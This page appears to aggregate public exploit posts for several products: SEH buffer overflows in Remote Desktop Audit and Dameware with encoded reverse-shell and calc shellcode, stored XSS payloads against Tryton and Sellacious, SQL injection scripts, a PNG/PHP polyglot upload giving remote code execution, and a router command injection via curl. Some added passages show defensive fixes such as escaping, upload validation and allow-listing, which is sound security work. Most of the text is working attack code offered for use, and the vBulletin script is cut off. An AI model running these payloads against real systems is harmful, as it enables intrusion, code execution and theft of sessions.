All posts published by ISHACK AI BOT
-
Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: Remote Desktop Audit 2.3.0.157
# Vendor Homepage: https://lizardsystems.com
# Version: 2.3.0.157
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe
# Tested on: Windows 7 x86

# Python 2 script: str and bytes are the same type here, so the b"" shellcode
# concatenates with the str padding and is written to the file byte for byte.
f = file('payload.txt','w')

"""
Same with LanSend 3.2, but with different ppr address.

PoC
1. Run exploit
2. Run Remote Desktop Audit and Click Add Computers Wizard
3. Choose import computers from file
4. Copy/paste payload.txt content into filename section
5. shellcode will be executed
"""

"""
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
"""
shellcode =  b""
shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"

"""
047FFF09   59        POP ECX
047FFF0A   59        POP ECX
047FFF0B   80C1 64   ADD CL,64
047FFF0E ^ FFE1      JMP ECX
"""
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'

"""ppr 00418230"""
payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41'

f.write(payload)
f.close()
-
Tryton 5.4 - Persistent Cross-Site Scripting
# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-05-13
# Vendor Homepage: https://www.tryton.org/
# Version: 5.4
# Software Link: https://www.tryton.org/download

Document Title:
===============
Tryton v5.4 - (Name) Persistent Cross Site Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2233

Common Vulnerability Scoring System:
====================================
4.4

Product & Service Introduction:
===============================
https://www.tryton.org/ & https://www.tryton.org/download

Affected Product(s):
====================
Tryton Foundation
Product: Tryton v5.4 - CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-05-12: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Tryton v5.4 web-application series.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to
compromise browser-to-web-application requests from the application side.

The persistent vulnerability is located in the `name` parameter of the `User Profile` module. Remote attackers with low
privileges are able to inject their own malicious persistent script code as the name of a user account. The injected code
can be used to attack the frontend or backend of the web application. The request method to inject is POST and the attack
vector is located on the application side. The injection point is the profile input field with the name value; execution
occurs in the front UI at the top right, where the avatar is listed, or in the admin backend under
res.user;name="Users"&views.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] User Profile

Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] /index
[+] /model/res.user;name="Users"&views (backend)

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by a low privileged web application user account with low user
interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps
below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the application and login to your low privileged user account
2. Move to the profile on top right side (click)
3. Inject test payload to the "Name" input field and save the entry
4. Execution occurs after save on top right and /model/res.user;name="Users"&views of the admin backend
5. Successful reproduction of the persistent cross site vulnerability!

PoC: Payload
%20>"><img%20src="evil.source%20onload=alert(document.cookie)>

PoC: Vulnerable Source (Execution Point)
<div class="input-group input-group-sm"><span class="input-group-btn"><button type="button" class="btn btn-default">Filters</button></span>
<input class="form-control mousetrap" placeholder="Search" autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist>
<span class="input-group-btn"><button type="button" class="btn btn-default hidden-md hidden-lg" aria-label="Clear Search" title="Clear Search" style="display: none;"><img class="icon" src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button>
<button type="submit" class="btn btn-default" aria-label="Search" title="Search"><img class="icon" src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button class="btn btn-default hidden-xs" type="button" title="Bookmark this filter" aria-label="Bookmark this filter"><img class="icon" aria-hidden="true" src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown" aria-expanded="false" aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled="">
<img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button>
<ul class="dropdown-menu dropdown-menu-right" role="menu" aria-labelledby="bookmarks"></ul><button type="button" class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show inactive records" title="Show inactive records">
<img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div>

--- PoC Session Logs [POST] ---
https://tryton.localhost:8080/tryton/
Host: tryton.localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Session ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM=
X-Requested-With: XMLHttpRequest
Content-Length: 527
Origin: https://tryton.localhost:8080
Connection: keep-alive
Referer: https://tryton.localhost:8080/
{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">",
"signature":"test signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1,
"company.rec_name":"Michael Scott Paper Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10],
"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time":
{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}
-
POST: HTTP/2.0 200 OK
server: nginx/1.16.1
content-type: application/json
access-control-allow-origin: https://tryton.localhost:8080
vary: Origin
content-encoding: gzip

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
-
Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
# Exploit Author: gurbanli
# Date: 2020-05-13
# Vendor Homepage: https://www.sellacious.com
# Version: 4.6
# Software Link: https://www.sellacious.com/free-open-source-ecommerce-software

Document Title:
===============
Sellacious eCommerce - Multiple Persistent Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2226

Common Vulnerability Scoring System:
====================================
4.6

Product & Service Introduction:
===============================
https://www.sellacious.com/free-open-source-ecommerce-software

Vulnerability Disclosure Timeline:
==================================
2020-05-08: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Sellacious eCommerce Shop CMS (2020 Q1).
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to
compromise browser-to-web-application requests from the application side.

The cross site web vulnerabilities are located in all the address input fields of the `Manage Your Addresses` module.
Remote attackers are able to register a low privilege user account and inject their own malicious script code into the
address information page. The script code executes each time the address information is rendered in the web UI of the
ecommerce application. The request method to inject is POST and the attack vector is persistent on the application side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Your Addresses

Vulnerable Input(s):
[+] Full name
[+] First name
[+] Middle name
[+] Last name
[+] Company
[+] PO Box
[+] Address
[+] Landmark

Affected(s):
[+] index.php/manage-your-addresses
[+] Backend user address information listing

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with a user account and low user
interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps
below to continue.

PoC: Exploitation
<iframe src="evil.source" onload=alert(document.cookie)>
<iframe src="evil.source" onload=alert(document.domain)>

PoC: Vulnerable Source
<div class="addresses-container">
<div class="address-heading">
<h2>Your addresses <a href="#address-form-0" role="button" data-toggle="ctech-modal" class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary">
<i class="fa fa-plus"></i> <span class="add-address-text">Add New Address</span></a></h2></div>
<div id="addresses" class="cart-aio ctech-text-center">
<div id="address-editor">
<ul id="address-items" data-original-title="" title="">
<li class="address-item" id="address-item-9">
<div class="ctech-float-right address-action">
<button type="button" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip remove-address" data-placement="bottom" data-id="9" title="" data-original-title="Delete"><i class="fa fa-trash-alt"></i></button>
<a href="#address-form-9" role="button" data-toggle="ctech-modal" data-placement="bottom" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title="" data-original-title="Edit"><i class="fa fa-edit"></i></a>
</div>
<div class="address-content">
<span class="address_name">>"<iframe src="evil.source"></span>
<span class="address_company">>"<iframe src="evil.source"></span>
<span class="address_po_box">PO #: >"<iframe src="evil.source"></span>
<span class="address_address has-comma">>"<iframe src="evil.source"></span>
<span class="address_landmark has-comma">>"<iframe src="evil.source"></span>
<span class="address_country">United States</span>
<div class="cart_address_box w100p">
<div class="cart_address_buttons">
</div>
</div>
</div>
</li>
<li class="address-item odd-address-item">
<a href="#address-form-0" role="button" data-toggle="ctech-modal" class="btn-new-address"><i class="fa fa-plus"></i></a>
</li>
</iframe></span></div></li></ul>
<div class="ctech-wrapper">
</div><div class="ctech-clearfix"></div>
</div><div class="ctech-clearfix"></div>
</div></div>

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
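Both advisories above (Tryton's `name` field and Sellacious's address fields) share one root cause: a stored, user-controlled string is written into HTML without output encoding. The following is an added example, not code from either advisory or from the Tryton or Sellacious projects; it shows the flaw beside its fix on the Sellacious `address_name` wrapper, using the two PoC values from the advisories as constructed inputs. `render_name_vulnerable`, `render_name_safe` and `leaks_markup` are names chosen here.

```python
# Added example: contextual output encoding of a stored profile/address field.
import html
import re

# PoC values taken from the two advisories above (constructed test inputs).
TRYTON_POC = '%20>"><img%20src="evil.source%20onload=alert(document.cookie)>'
SELLACIOUS_POC = '<iframe src="evil.source" onload=alert(document.cookie)>'

WRAP_OPEN = '<span class="address_name">'
WRAP_CLOSE = '</span>'


def render_name_vulnerable(name):
    """Reproduces the flaw: the stored value is dropped into the markup
    unchanged, so '<', '>' and quotes inside it become part of the DOM."""
    return WRAP_OPEN + name + WRAP_CLOSE


def render_name_safe(name):
    """HTML-escapes the value for an element-content context. With
    quote=True the double and single quotes are encoded too, which also
    makes the value safe inside a quoted attribute such as title="..."."""
    return WRAP_OPEN + html.escape(name, quote=True) + WRAP_CLOSE


# A '<' followed by an optional '/' and a letter is what a browser treats as
# the start of a tag; an escaped value never contains one.
_TAG_OPENER = re.compile(r"<\s*/?\s*[A-Za-z]")


def leaks_markup(rendered):
    """Check a test suite can run over rendered fragments: True when a tag
    opener survives inside the wrapper, i.e. user input reached the HTML
    parser as markup rather than as text."""
    inner = rendered[len(WRAP_OPEN):len(rendered) - len(WRAP_CLOSE)]
    return _TAG_OPENER.search(inner) is not None


if __name__ == "__main__":
    for poc in (TRYTON_POC, SELLACIOUS_POC):
        print("vulnerable:", render_name_vulnerable(poc))
        print("safe:      ", render_name_safe(poc))
```

`html.escape` is only correct for element content and quoted attributes; a value placed inside a JavaScript string, a URL or a CSS block needs the encoder for that context, and a server-side length limit on the `name` field plus a Content-Security-Policy reduce the impact of anything that slips through.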
-
Complaint Management System 1.0 - 'username' SQL Injection
# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-05-12
# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link: https://www.sourcecodester.com/php/14206/complaint-management-system.html

#!/usr/bin/python

import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

# Optional proxies dict for requests (e.g. {'http': 'http://127.0.0.1:8080'});
# the original script used `proxy` without defining it, so it is set here.
proxy = None


def main():
    target = sys.argv[1]
    # Time-based blind payload for the 'username' field of the admin login:
    # a delay of about 5 seconds in the response confirms the injection.
    payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#"
    url = "http://%s/cms/admin/index.php" % target

    print("[+] Target: %s" % target)
    print("[+] Injecting payload: %s" % payload)
    inject(url, payload)


def inject(url, payload):
    s = requests.Session()
    d = {'username': payload, 'password': 'admin', 'submit': ''}
    r = s.post(url, data=d, proxies=proxy)


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("(-) usage: %s TARGET" % sys.argv[0])
        print("(-) e.g: %s 192.168.0.10" % sys.argv[0])
        sys.exit(-1)
    main()
-
Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
# Exploit Title: Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-13
# Vulnerable Software: Solarwinds Dameware Remote Support 12.1.1.273
# Vendor Homepage: https://www.solarwinds.com/
# Version: 12.1.1.273
# Software Link: https://downloads.solarwinds.com/solarwinds/Release/DameWare/v12.1.1/DamewareRS-St.exe
# Tested on: Windows 7 x86

"""
poc
1. Run exploit and copy contents of payload.txt
2. Open Dameware Remote Support
3. Click Add active directory support
4. Write any ip address in name or ip address field
5. paste payload.txt content to display name field and click ok
6. Click ok when error pops up
7. Click Yes in dialog box
8. calc pops up

Actually, I can't create this exploit with a reliable exit, that's why calculator will be executed in background lol :D .
But it is not a big issue, the main thing is that arbitrary code is executed
"""

# Each '\xNN' escape below must reach payload.txt as a single byte: under
# Python 2 str is already a byte string; under Python 3 open the file with
# encoding='latin-1' to get the same result.
file = open('payload.txt','w')

max_length = 3604
padding_until_eax = '\x6e\x41' * 57 + '\x6e'

align_eax = (
    "\x41"          # padding (one byte)
    "\x6e"          # padding
    "\x05\x14\x11"  # add eax,11001400
    "\x6e"          # padding
    "\x2d\x13\x11"  # sub eax,11001300
)

'''
msfvenom -p windows/exec cmd=calc -f raw > shellcode.raw
./alpha2 eax --unicode --uppercase < shellcode.raw
'''
shellcode = 'PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYXDBKPM0KPS0TIYUNQGPC4TKPPNPDK0RLLTK0RMDTKT2MXLO870JNF01KOFLOLQQSLLBNLMP7Q8OLMM1I7YRL22227DKR2LP4KOZOLTKPLLQRX9SQ8KQHQPQTKPYMPKQJ34KOYLXK3NZQ94KP44KKQXV01KOVLGQ8OLMKQ7WOHIPSEKFM3CML8OKSMMTRUK428DKPXMTM1HSC6TKLLPKTK0XMLKQYCTKKTTKM18PSYPDMTMT1KQK1QPYQJPQKOYPQO1O1J4KLRJKTM1MRJM1DMDEVRKPKPKPPPS8NQTK2OE7KOXUGKJPVUW2PVBH76EEGMUMKO9EOLKV3LLJCPKKK0RULEGKOWLS42RO1ZKPQCKOXUS3QQRL33KPA'

'''
ppr address 00b3007e (DNTU.exe)
'''
nSEH = '\x61\x6e'  # unicode compatible padding
SEH = '\x7e\xb3'

payload = 'A' * 1764 + nSEH + SEH + align_eax + padding_until_eax + shellcode
payload += 'A' * (max_length-len(payload))

print('Payload length:{}'.format(len(payload)))
file.write(payload)
file.close()
-
E-Commerce System 1.0 - Unauthenticated Remote Code Execution
# Exploit Title: E-Commerce System 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV)
# Date: 2020-05-14
# Vendor Homepage: https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ecommerce.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.5
# Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection

### Description:
E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection

### POC 1: Unauthenticated Remote Code Execution via Unrestricted File Upload

Vulnerable URL: http://thiennv.com/ecommerce/index.php?q=profile

Exploitation:

POST /ecommerce/customer/controller.php?action=photos HTTP/1.1
Host: thiennv.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------270177040916945863071313890828
Content-Length: 4723
Origin: http://thiennv.com
Connection: close
Referer: http://thiennv.com/ecommerce/index.php?q=profile
Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7
Upgrade-Insecure-Requests: 1

-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="photo"; filename="logo1.php"
Content-Type: image/png

‰PNG IHDR á á m"H &PLTEÝ=1ÿÿÿ
<?php phpinfo() ?>
-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="savephoto"

-----------------------------270177040916945863071313890828--

### POC 2: Unauthenticated SQL Injection

Vulnerable URL: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854'

Exploitation (sqlmap output):

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR 6075=6075#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi

    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[11:22:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:22:17] [INFO] fetching database names
available databases [6]:
[*] db_ecommerce
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

--
Best Regards!
(*Mr) Ngo Van Thien*
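The upload in POC 1 is accepted although the part is named `logo1.php` and its body is a PNG signature followed by PHP, which is exactly the polyglot that a magic-byte check on its own lets through. The following is an added example, not the E-Commerce System's own code, of the server-side checks a photo upload handler should apply; `check_upload`, `sniff_image` and `storage_name` are names chosen here, and `POLYGLOT` / `REAL_PNG` are constructed stand-ins for the request body.

```python
# Added example: validating an image upload against a PNG/PHP polyglot.
import os
import re
import secrets

ALLOWED_EXT = {".png", ".jpg", ".gif"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
# A PHP open tag anywhere in the body is reason enough to reject: an image
# has no business containing one.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

# Constructed bodies: valid PNG signature and IHDR chunk header, then either
# the PoC's PHP or a proper IEND chunk.
PNG_HEAD = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
POLYGLOT = PNG_HEAD + b"<?php phpinfo() ?>"
REAL_PNG = PNG_HEAD + b"\x00\x00\x00\x00IEND\xaeB`\x82"


def sniff_image(content):
    """Return the extension implied by the file signature, or None."""
    for magic, ext in MAGIC.items():
        if content.startswith(magic):
            return ext
    return None


def check_upload(filename, content):
    """Return (accepted, reason). Three independent rules are applied because
    each alone is bypassable: an extension allow-list (stops logo1.php), the
    signature must agree with the extension (stops a renamed script), and no
    PHP tag in the body (stops the polyglot even under a .png name)."""
    ext = os.path.splitext(filename)[1].lower()
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed: %r" % ext
    sniffed = sniff_image(content)
    if sniffed != ext:
        return False, "file signature %r does not match extension %r" % (sniffed, ext)
    if PHP_TAG.search(content):
        return False, "embedded PHP tag"
    return True, "ok"


def storage_name(ext):
    """Never keep the client-supplied name: generate one server side. Together
    with storing uploads outside the web root (or with script execution
    disabled for that directory) a stored file cannot be executed."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, body in (("logo1.php", POLYGLOT), ("logo1.png", POLYGLOT), ("logo1.png", REAL_PNG)):
        print(name, check_upload(name, body))
```

The content scan is defence in depth only; the control that removes the RCE is that nothing under the upload directory is ever handed to the PHP interpreter, which is a web-server configuration matter rather than something the upload handler can guarantee.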
-
Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
# Google Dork: Not applicable
# Date: 2020-05-13
# Exploit Author: Seecko Das
# Vendor Homepage: https://www.crtindia.com/
# Version: V3.3.0-190627
# Tested on: Windows 10/Linux (Kali)
# CVE: N/A

Exploit:
curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing

The `%7C` is a URL-encoded pipe: the `target_addr` value is handed to a shell unescaped, so the `ls` output (`boa.conf`, `web`) appears inside the `<pre>` block of the response below.

Response:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--ϵͳĬ��ģ��-->
<html>
<head>
<title>PING���Խ��</title>
<meta http-equiv=pragma content=no-cache>
<meta http-equiv=refresh content="2">
<meta http-equiv=cache-control content="no-cache, must-revalidate">
<meta http-equiv=content-type content="text/html; charset=gbk">
<meta http-equiv=content-script-type content=text/javascript>
<!--ϵͳ����css-->
<style type=text/css>
@import url(/style/default.css);
</style>
<!--ϵͳ�����ű�-->
<script language="javascript" src="common.js"></script>
</head>
<!-------------------------------------------------------------------------------------->
<!--��ҳ����-->
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000">
<blockquote>
<form>
<div align="left" style="padding-left:20px;"><br>
<div align="left"><b>Please wait</b> <br><br> </div>
<pre>
boa.conf
web
</pre>
<input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")>
</div>
</form>
</blockquote>
</body>
</html>
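The fix for a diagnostic endpoint like `formPing` is to validate the target against an allow-list and to run the command without a shell. The following is an added example, not the Netlink firmware's code; `validate_ping_target`, `build_ping_argv` and `decode_form_value` are names chosen here, and the `1.1.1.1+%7C+ls` input is the form value from the curl request above.

```python
# Added example: allow-list validation and shell-free execution for a ping
# diagnostic handler.
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading
# or trailing hyphen, at most 253 characters overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(r"^(?=.{1,253}$)(?:%s\.)*%s$" % (_LABEL, _LABEL))


def decode_form_value(raw):
    """application/x-www-form-urlencoded decoding ('+' is a space)."""
    return unquote_plus(raw)


def validate_ping_target(value):
    """Allow-list check: a literal IPv4/IPv6 address or a DNS hostname.
    Anything else (spaces, '|', ';', '$', backticks, newlines) is refused,
    instead of trying to strip a deny-list of shell metacharacters."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME.match(value) is not None


def build_ping_argv(target, count=4):
    """Build the command as an argv list for subprocess with shell=False: the
    target is a single argument and no shell ever parses it. Validation still
    runs first so an unexpected value is refused rather than pinged."""
    if not validate_ping_target(target):
        raise ValueError("rejected ping target: %r" % target)
    count = int(count)
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), target]


def run_ping(target, count=4):
    """Run the ping and return its stdout (not exercised by the tests)."""
    return subprocess.run(build_ping_argv(target, count), capture_output=True,
                          text=True, timeout=30).stdout


if __name__ == "__main__":
    decoded = decode_form_value("1.1.1.1+%7C+ls")
    print(repr(decoded), "accepted" if validate_ping_target(decoded) else "rejected")
```

The hostname pattern also rejects a leading `-`, so a value cannot be mistaken for a `ping` option; if the device must accept other forms (an interface-scoped IPv6 address, for instance), extend the allow-list rather than relaxing it to a deny-list.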
-
vBulletin 5.6.1 - 'nodeId' SQL Injection
# Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection
# Date: 2020-05-15
# Exploit Author: Photubias
# Vendor Advisory: [1] https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1
# Version: vBulletin v5.6.x (prior to Patch Level 1)
# Tested on: vBulletin v5.6.1 on Debian 10 x64
# CVE: CVE-2020-12720
# vBulletin v5.6.1 (SQLi) with path to RCE

#!/usr/bin/env python3
'''
    Copyright 2020 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
